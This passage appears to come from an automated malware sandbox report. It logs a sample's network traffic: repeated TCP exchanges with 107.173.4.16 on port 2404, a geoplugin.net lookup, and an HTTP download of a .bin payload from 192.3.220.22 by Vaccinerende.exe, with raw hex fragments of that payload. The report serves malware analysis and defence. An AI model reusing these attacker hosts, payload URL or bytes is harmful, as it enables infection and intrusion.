                                          Sep 30, 2024 14:00:59.572124004 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.572174072 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.572237968 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.574862003 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.584446907 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:59.589376926 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.600343943 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:59.605222940 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.611326933 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:59.612658024 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:59.615561962 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:59.616281033 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.616328955 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.616374969 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.616388083 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.616442919 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.616550922 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.616564989 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.617566109 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.617600918 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.617613077 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.617687941 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.620836020 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.631258011 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:59.636127949 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.647001982 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:59.651892900 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.658581018 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:59.659858942 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:59.662278891 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:59.663549900 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.663662910 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.663759947 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.663789988 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.663801908 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.663815975 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.663886070 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.664784908 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.664797068 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.664808989 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.664858103 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.667078018 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.678626060 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:59.683556080 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.693718910 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:59.698625088 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.704571009 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:59.705895901 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:59.709427118 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.709480047 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.709568024 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.709589005 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.709712029 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.709753036 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.709795952 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.710905075 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.711035967 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.711047888 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.711060047 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.712743998 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:59.717621088 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.721851110 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.725132942 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:59.743607998 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.745915890 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:59.750673056 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.751955032 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:59.752731085 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.753253937 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:59.753281116 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:59.755973101 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:59.756851912 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.756907940 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.757128000 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.757139921 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.757162094 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.757174015 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.757184982 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.758156061 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.758167982 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.758192062 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.758287907 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.760865927 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.792020082 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:59.797408104 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.798330069 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.798391104 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:59.807004929 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:59.815361023 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:59.816660881 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:59.818757057 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.818815947 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:59.820363045 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.820468903 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.820482016 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.820554972 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.820637941 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.820656061 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.820687056 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.821580887 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.821633101 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.821645021 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.821717978 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.824687004 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.834119081 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:59.839030981 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.876523018 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:59.877825022 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:59.880040884 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:59.881422043 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.881491899 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.881536961 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.881643057 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.881683111 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.881771088 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.881783962 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.882719994 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.882843971 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.882879972 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.882994890 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.884844065 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.918801069 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.923913956 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:59.925195932 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:59.928225994 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:59.928862095 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.928900957 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.929007053 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.929105043 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.929137945 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.929225922 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.929254055 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.930073023 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.930123091 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.930213928 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.930329084 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.933119059 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.969957113 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.970988035 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:59.972309113 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:59.975863934 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:59.975971937 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.976005077 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.976048946 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.976242065 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.976252079 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.976259947 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.976289988 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.977286100 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.977296114 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.977303982 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.977379084 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.980755091 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.990570068 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:59.995492935 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.006546021 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:01:00.011487007 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.040533066 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:01:00.129906893 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:01:00.286720037 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:01:00.288183928 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:01:00.291505098 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:01:00.306458950 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.307074070 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.307147026 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:01:00.307157040 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.307204962 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:01:00.308063984 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.308373928 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.308489084 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.308624029 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.308645964 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.308661938 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.308762074 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.308770895 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.309245110 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.309253931 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.309262037 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.309269905 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.309278965 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.309288025 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.309294939 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.309303999 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.309317112 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.309325933 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.309329987 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.309334993 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.309338093 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.309349060 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.309357882 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.342541933 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.396573067 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:01:00.430960894 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.435168028 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:01:00.438103914 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:01:00.439644098 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:01:00.440080881 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.443008900 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.443037033 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.443092108 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.443145990 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.443156004 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.443510056 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.443520069 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.444777966 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.445148945 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.445158958 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.445167065 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.445918083 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:01:00.450715065 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.536623955 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:01:00.542414904 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.553467035 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:01:00.556835890 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:01:00.558142900 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:01:00.558517933 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.561919928 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.562000036 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.562021971 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.562102079 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.562155008 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.562233925 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.562242985 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.563103914 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.563143969 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.563169956 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.563322067 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.568658113 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:01:00.573631048 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.584286928 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:01:00.589250088 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.600645065 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:01:00.606012106 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.613090992 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:01:00.614381075 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:01:00.615533113 CEST497412404192.168.2.4107.173.4.16

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          Sep 30, 2024 13:59:47.621788979 CEST192.168.2.41.1.1.10xc568Standard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Sep 30, 2024 13:59:47.629160881 CEST1.1.1.1192.168.2.40xc568No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                          HTTP Packets

                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.449737192.3.220.22805916C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 30, 2024 13:59:43.071100950 CEST179OUTGET /hFXELFSwRHRwqbE214.bin HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                          Host: 192.3.220.22
                                          Cache-Control: no-cache
                                          Sep 30, 2024 13:59:43.556668997 CEST1236INHTTP/1.1 200 OK
                                          Date: Mon, 30 Sep 2024 11:59:42 GMT
                                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                          Last-Modified: Sun, 29 Sep 2024 22:47:51 GMT
                                          ETag: "78c40-62349e0caa82a"
                                          Accept-Ranges: bytes
                                          Content-Length: 494656
                                          Content-Type: application/octet-stream
                                          Data Raw: 4e a0 96 ff 79 3e 6e 05 34 71 21 6e e1 21 b3 d3 89 05 24 c0 68 72 32 b6 27 8a fa 2f a4 d2 30 70 b0 60 2e b2 48 53 fa 14 95 ef c8 19 07 86 19 d0 48 ef b0 c8 59 6a d5 c0 8b 6c 17 6a 57 54 63 f5 f0 c3 db 7c d2 0e db 7c d1 78 ee 47 7e a8 1f b6 d1 ae 8a d8 da bb 54 e2 ff 93 b8 ad 09 6c 87 4b a2 ed f4 5d a0 73 88 ad ae 42 80 39 24 83 72 2e 43 b0 ae 05 a8 f0 9b 12 3d 08 9b 96 8c 2d 42 27 6e c4 a5 e1 c8 12 d8 1f 30 6b 99 d6 6e d4 15 a5 92 d0 2a 76 f4 45 77 84 ef 33 2a f1 7d e7 f3 ed f8 36 f6 79 a7 25 3a 90 ff b8 f5 64 38 94 3a 3f fe ee a4 50 8c c5 d8 d3 49 21 69 83 d0 70 86 ff db 86 c5 4c d9 bb 26 3d ef 54 f3 c6 21 b3 26 60 be 03 f4 3a 08 7c 6b 8a dc 89 14 ac 86 11 35 44 93 fb 9e a6 ca b5 94 d6 be 8a 1b a2 75 2a 49 15 2f 07 e0 b9 53 a8 66 19 37 2b ad e8 42 c5 1f a9 9b 58 f4 e3 ea 38 d9 f3 17 5c 86 f4 d7 4e f4 fc 5f 6b 38 be 5d af 09 f6 37 53 44 25 2a ab 2b f4 4c b8 12 af 4c 49 e3 78 50 99 a0 c6 03 ca ee 3d 36 c3 09 41 3c ad 25 00 3e d4 f4 cb 4d 4c aa d7 de 79 35 75 e7 00 e0 5b 89 7d ed cf 20 dc c1 36 a9 a4 [TRUNCATED]
                                          Data Ascii: Ny>n4q!n!$hr2'/0p`.HSHYjljWTc||xG~TlK]sB9$r.C=-B'n0kn*vEw3*}6y%:d8:?PI!ipL&=T!&`:|k5Du*I/Sf7+BX8\N_k8]7SD%*+LLIxP=6A<%>MLy5u[} 6_:7dr`0qC_|_I^<D(o%dj*qJx)<,VD$9yD+<}4Ht:Qo'}u-p"=5Z}gBc?O%G^2>kiJTsToX5AJ3R0]uNL't~ahZ,z{3B*YK!TtbG4SoR>+hy]>r`?t#H%h>=+&0l.LbR13ST(u2`hN5^M%"UPA7FgMLE^NlJBQL{\(l*~hN$R-EgHg]/11ONoi|RqvAGJnDb$.1Z!v.%UBj{l0'j*v'S`}F;&RT-FfkR8^9UJs>HD%C#d
                                          Sep 30, 2024 13:59:43.556685925 CEST224INData Raw: 7a c6 25 bd 9b a9 7e 31 df 9f 22 d3 d7 90 9b b7 fe 66 df 4d 36 a9 cc 83 9f d6 42 22 c3 2b cf 1d d8 62 32 05 a8 f1 7e 6d 61 82 bf 00 42 c1 5b 0f 86 af 0a d7 a5 af d3 7a ce f2 f3 24 8b 14 2c 0c 83 88 22 98 45 31 87 b8 7b 28 9c 9b 90 25 84 58 e5 ed
                                          Data Ascii: z%~1"fM6B"+b2~maB[z$,"E1{(%X[n~vsgsK@<$f%.I9p?@OyL`]Vb:/4]BIf<I0qji"/c=E:P69;'&
                                          Sep 30, 2024 13:59:43.556713104 CEST1236INData Raw: 4a 77 5d 1a 1c af 15 d5 0f fe 12 91 21 95 91 94 2b 24 ee c9 63 fc fb 51 ca 70 2e 61 69 ef 38 6b fd 65 36 0b a5 bd d9 85 36 0d 87 4a f1 09 be 8a b6 71 4b fa c8 2d ba ce 79 ac 1b 3c 40 ee ae 4f e7 1e 7a b8 99 4f 13 24 9e c5 9c ec 45 5f d2 be cb 89
                                          Data Ascii: Jw]!+$cQp.ai8ke66JqK-y<@OzO$E_{GN3D2AP+q?CVB5/,E03XG0uqjG( 'm*El9#hZh_J4#quLW'nz9c=}-,[PC:q%?)YhVz?741
                                          Sep 30, 2024 13:59:43.556735039 CEST224INData Raw: 81 fa 65 00 4f 53 1a 8e ee 48 6f eb 11 db a2 62 fa dc d5 72 92 15 a6 b3 e8 7e 95 58 0f 05 6b 06 14 2e eb f7 76 cd 32 a3 db ff 30 20 f3 f7 ac 2e 70 e1 7f 84 b8 f8 ec 90 58 1b 69 a0 54 60 24 7c 46 e5 3a d2 d7 79 c4 b7 95 02 38 76 bd bd 3a 0f 89 05
                                          Data Ascii: eOSHobr~Xk.v20 .pXiT`$|F:y8v:\ E"!a>)11/?xt"0*Xu"l3#V2SpDRDMt'<Vt|o:@`nB\/{QJdl9j)/.
                                          Sep 30, 2024 13:59:43.556744099 CEST1236INData Raw: da 63 d0 3d 63 bf 36 34 a2 dc 5d 42 38 fe 0d a4 ff 0c 3e 4c e6 01 7b 82 98 77 b8 ab 07 ac 98 75 f2 db 2d 45 d2 8c db 51 82 ec 97 89 1c 18 33 9d de 71 35 2b 69 d9 46 b0 a5 b0 d4 96 f2 18 7c 36 0b eb 79 a2 c5 a1 a9 bb 5b 0e 0e f0 88 59 2a b5 b0 fc
                                          Data Ascii: c=c64]B8>L{wu-EQ3q5+iF|6y[Y*? NaJw!zp5i{91(XK<e2Aw?{UggJny=))W_?3ixkh5mA%I}{Z2{
                                          Sep 30, 2024 13:59:43.556756020 CEST1236INData Raw: 7e 6d ea b7 af 93 07 c1 d6 4b a2 bf 5f 87 cf ab 8e 2f a6 02 ae 62 8b 43 d3 da e9 88 af dc 61 25 d7 ed f6 6c b8 bb c0 72 7b 8e 8f ed 85 1f 4a 6a a6 8a 1e 8b 3a 58 c0 ae 6b 7b 80 b1 fe e9 29 15 9c 1e 28 af 59 43 3c ad 2c 38 92 24 eb cd 01 3a 19 db
                                          Data Ascii: ~mK_/bCa%lr{Jj:Xk{)(YC<,8$:^T<Ot0;N9qrL7ni!&6WTN6c<xV@FzcU.J1pB&*94_Z%Au'85
                                          Sep 30, 2024 13:59:43.556768894 CEST1236INData Raw: 90 ba 9f 2c 69 70 22 df 50 cb 13 f3 09 f7 0e ba 91 ad a5 ce d9 f0 a5 bc 48 0d 5d 45 30 39 dc 99 d7 c4 d7 97 43 20 8b 70 1e a4 46 38 2a 5d c9 33 08 e8 62 71 9e 2b 9e 95 44 1a 0e 75 19 fc 7c 9b d0 44 4a 13 20 8a 2e 8e 6e 31 dd b3 88 4a 1f 91 78 2f
                                          Data Ascii: ,ip"PH]E09C pF8*]3bq+Du|DJ .n1Jx/+pf-"n{)2WPj"p{.j&`k#?@PE%tzu6UA!!Hy5M6V>M2+MS~}Bny=,|o(
                                          Sep 30, 2024 13:59:43.556780100 CEST672INData Raw: 22 fa 53 11 88 f9 b0 3e fa 69 e6 a0 11 e4 43 35 78 7f 6b 1e f8 1b f4 f9 c8 23 8b 71 36 98 cc 90 85 af 66 26 dd 27 d2 4f ab 07 f5 6f 75 8a 2f de ab f8 90 0b af 7a a6 56 10 ea 9e 28 24 3f 00 62 e7 d9 13 10 55 95 13 ac b5 67 d9 ef d9 30 03 7b e3 c7
                                          Data Ascii: "S>iC5xk#q6f&'Oou/zV($?bUg0{QxW,4uPHC'.LzGbhUiI\J=Z;rt)c{La`,Or\'+<"}Vqr-gY$gk~?.ol^/1.D\
                                          Sep 30, 2024 13:59:43.556792021 CEST1236INData Raw: 7b 0e 59 9a 34 fe d6 68 a6 5d a6 14 6b 62 30 46 d5 3e 51 a9 48 2a 86 70 66 e8 7c b5 d0 14 01 d9 c4 0b be 7e 21 8b 0b 65 cb 1d df 45 d8 42 c3 83 9a e1 5e 75 7b 10 34 e3 c6 fb 94 81 96 c1 12 f6 99 74 67 82 1c d7 30 5f f5 bc 85 d7 8d 05 14 0b a5 37
